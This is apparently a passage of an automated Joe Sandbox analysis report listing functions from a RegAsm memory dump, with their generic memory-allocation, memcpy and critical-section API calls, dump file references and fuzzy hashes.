                                                                                        • Part of subcall function 6C1390E0: free.MOZGLUE(?,00000000,?,?,6C13DEDB), ref: 6C1390FF
                                                                                        • Part of subcall function 6C1390E0: free.MOZGLUE(?,00000000,?,?,6C13DEDB), ref: 6C139108
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C13B2C9,?,?,?,6C13B127,?,?,?,?,?,?,?,?,?,6C13AE52), ref: 6C13B67D
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C13B2C9,?,?,?,6C13B127,?,?,?,?,?,?,?,?,?,6C13AE52), ref: 6C13B708
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C13B127,?,?,?,?,?,?,?,?), ref: 6C13B74D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: freemalloc
                                                                                      • String ID:
                                                                                      • API String ID: 3061335427-0
                                                                                      • Opcode ID: e1e98c2bc1ebc27d5af63402f6bff6b2baad9c437867be9b50d58d52c3bef2e9
                                                                                      • Instruction ID: fe9e759622ae00ca6fd8bd7aad90da227a7bccf06297112498e4a772c1496dbc
                                                                                      • Opcode Fuzzy Hash: e1e98c2bc1ebc27d5af63402f6bff6b2baad9c437867be9b50d58d52c3bef2e9
                                                                                      • Instruction Fuzzy Hash: 115102B1A01A258FDB14CF18C99476EB7B1FF44308F46A12DC84EAB741EB30E804CBA1
                                                                                      APIs
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C12FF2A), ref: 6C13DFFD
                                                                                        • Part of subcall function 6C1390E0: free.MOZGLUE(?,00000000,?,?,6C13DEDB), ref: 6C1390FF
                                                                                        • Part of subcall function 6C1390E0: free.MOZGLUE(?,00000000,?,?,6C13DEDB), ref: 6C139108
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C12FF2A), ref: 6C13E04A
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C12FF2A), ref: 6C13E0C0
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C12FF2A), ref: 6C13E0FE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: freemalloc
                                                                                      • String ID:
                                                                                      • API String ID: 3061335427-0
                                                                                      • Opcode ID: 89b020a775af15c092977805c0e69665cb1c8f3f50bd2f30dadb16bb8ddad62d
                                                                                      • Instruction ID: 42ab0bf581ab65095765bc77d2ffa5e0a6b124e96bea5bfee96169f3598b7795
                                                                                      • Opcode Fuzzy Hash: 89b020a775af15c092977805c0e69665cb1c8f3f50bd2f30dadb16bb8ddad62d
                                                                                      • Instruction Fuzzy Hash: B141C0B17043268FEB14CF68C89036A73B6AF4630CF154929D65ADB740E736EE05CB92
                                                                                      APIs
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C1461DD
                                                                                      • memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C14622C
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C146250
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C146292
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: malloc$freememcpy
                                                                                      • String ID:
                                                                                      • API String ID: 4259248891-0
                                                                                      • Opcode ID: 25c7a2346945c0896b6d6b173fc60cdb4a8cdfc395497d3a80e7a6cbf014e30e
                                                                                      • Instruction ID: ebca8b9c013c85694be666f19a62269c1a4b73f60d325e051196556eedf22087
                                                                                      • Opcode Fuzzy Hash: 25c7a2346945c0896b6d6b173fc60cdb4a8cdfc395497d3a80e7a6cbf014e30e
                                                                                      • Instruction Fuzzy Hash: 0E310871A0060E8FDB04DF2CD880AAA73E9FBA530CF118639C55AD7652EB31E598CB50
                                                                                      APIs
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C136EAB
                                                                                      • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C136EFA
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C136F1E
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C136F5C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: malloc$freememcpy
                                                                                      • String ID:
                                                                                      • API String ID: 4259248891-0
                                                                                      • Opcode ID: cca5a77a9d14b403f4fab1d66249ca8430214b3c6eb05b454c207c691aba96ce
                                                                                      • Instruction ID: a5f840b4518c4de0f941bcbb9197577b87655e9fbaf860a995a1a9eb8e44eb16
                                                                                      • Opcode Fuzzy Hash: cca5a77a9d14b403f4fab1d66249ca8430214b3c6eb05b454c207c691aba96ce
                                                                                      • Instruction Fuzzy Hash: 5D310571A1061A8FEB04CF2CCC906AE73E9FB94348F508239D41AC7651EB31E659CB90
                                                                                      APIs
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C0F0A4D), ref: 6C14B5EA
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C0F0A4D), ref: 6C14B623
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C0F0A4D), ref: 6C14B66C
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C0F0A4D), ref: 6C14B67F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: malloc$free
                                                                                      • String ID:
                                                                                      • API String ID: 1480856625-0
                                                                                      • Opcode ID: 633b5107e7fc1320febf903d2372cd3bb167ffe084c0d229a9f96cfc6f5e295e
                                                                                      • Instruction ID: 59befd769992bf29c44faeefa06eeb4fa2bd2694e0e367d0a999aaab870ae68b
                                                                                      • Opcode Fuzzy Hash: 633b5107e7fc1320febf903d2372cd3bb167ffe084c0d229a9f96cfc6f5e295e
                                                                                      • Instruction Fuzzy Hash: 8F31E671A016168FDB10DF59C8546AEBBF5FF81304F16C669C8069B305EB31E916CBE1
                                                                                      APIs
                                                                                      • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C11F611
                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C11F623
                                                                                      • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C11F652
                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C11F668
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy
                                                                                      • String ID:
                                                                                      • API String ID: 3510742995-0
                                                                                      • Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                      • Instruction ID: 578a8525583e0dd6f728aed8d7eaa61ec711e268ec542ad8841165dd49d2e156
                                                                                      • Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                      • Instruction Fuzzy Hash: 39316FB1A04214AFC754CF1DCCC4A9FB7BAEB88354B188538FA598BF04E635E9458B90
                                                                                      APIs
                                                                                      • EnterCriticalSection.KERNEL32(6C16E744,6C147765,00000000,6C147765,?,6C106112), ref: 6C0E39AF
                                                                                      • LeaveCriticalSection.KERNEL32(6C16E744,?,6C106112), ref: 6C0E3A34
                                                                                      • EnterCriticalSection.KERNEL32(6C16E784,6C106112), ref: 6C0E3A4B
                                                                                      • LeaveCriticalSection.KERNEL32(6C16E784), ref: 6C0E3A5F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                      • String ID:
                                                                                      • API String ID: 3168844106-0
                                                                                      • Opcode ID: 67865aa1f106bebd50ecefed91672d8451993f492b325d1cded6ad67a8ddfd1c
                                                                                      • Instruction ID: 42c2aae4d65e3adcd314963338c065815d43b0d18165c5d6e41fe9676545a7b2
                                                                                      • Opcode Fuzzy Hash: 67865aa1f106bebd50ecefed91672d8451993f492b325d1cded6ad67a8ddfd1c
                                                                                      • Instruction Fuzzy Hash: DC2141323066118FC720CF2BC855B2AB7F0EF8A7187280629C96587F60DB30A901ABC1
                                                                                      APIs
                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C0FB96F
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020), ref: 6C0FB99A
                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C0FB9B0
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0FB9B9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy$freemalloc
                                                                                      • String ID:
                                                                                      • API String ID: 3313557100-0
                                                                                      • Opcode ID: 26e0a1e4dce82ca78e8b15056089d5bbe0e8249e86122cb239fc8741770a8fcb
                                                                                      • Instruction ID: d61e5e4a3735f118ecfef113fd11eb4d0a44ce93db5cf9f8df7ad51805191cd7
                                                                                      • Opcode Fuzzy Hash: 26e0a1e4dce82ca78e8b15056089d5bbe0e8249e86122cb239fc8741770a8fcb
                                                                                      • Instruction Fuzzy Hash: 29117FB5A002059FCB04DF69D8809ABB7F8FF88314B14853AE929D3701E731E9558AA0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: free
                                                                                      • String ID:
                                                                                      • API String ID: 1294909896-0
                                                                                      • Opcode ID: 89f4b36b3427eb4742333ecb67c6f781cf8dd68978729a854ad548cb2828c73a
                                                                                      • Instruction ID: ef025c1a41db26febae81a9c20881de5abd4d66abc4d4dffddae5ebdf32929e8
                                                                                      • Opcode Fuzzy Hash: 89f4b36b3427eb4742333ecb67c6f781cf8dd68978729a854ad548cb2828c73a
                                                                                      • Instruction Fuzzy Hash: 00F0F9F67012105BEB00AB58D888A57B3A9FF6125CB500035EE1EC3B03E731F919C6D5